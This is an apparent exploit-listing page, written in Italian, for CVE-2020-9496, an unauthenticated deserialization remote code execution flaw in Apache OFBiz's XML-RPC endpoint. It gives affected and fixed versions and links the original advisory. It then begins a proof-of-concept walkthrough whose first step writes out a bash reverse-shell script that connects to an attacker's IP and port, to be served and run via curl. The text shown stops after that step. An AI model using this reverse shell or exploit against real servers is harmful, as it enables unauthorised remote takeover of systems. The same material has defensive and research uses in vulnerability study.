Sploitus

Exploit for CVE-2020-9496

kitploit · 2026-08-25

Exploit Code

MARKDOWN23 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CYBER-NIZ-CVE-2020-9496
# CVE-2020-9496 - RCE

Poiché le 2 richieste relative a xmlrpc in webtools (xmlrpc e ping) non utilizzano l'autenticazione, sono vulnerabili a una deserializzazione non sicura. Questo problema è stato segnalato al team di sicurezza da Alvaro Munoz some-email@example.com del team GitHub Security Lab.

Questa vulnerabilità esiste a causa di problemi di serializzazione Java durante l'elaborazione delle richieste inviate a /webtools/control/xmlrpc. Un attaccante remoto non autenticato può sfruttare questa vulnerabilità inviando una richiesta appositamente predisposta. Uno sfruttamento riuscito comporterebbe l'esecuzione arbitraria di codice.

# Versione Affetta 17.12.01

# Versioni Corrette 18.12.01, 17.12.04

Blog Originale: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/

Per far funzionare questo POC dobbiamo inserire uno script shell e eseguire/accedere a quel file tramite curl.

### PASSO 1: Crea un file shell con una riga di comando Bash con il tuo indirizzo IP e la porta.

root@kitploit:~
    
    
    $ cat shell.sh
    #!/bin/bash
    /bin/bash -i >& /dev/tcp/10.10.x.x/1337 0>&1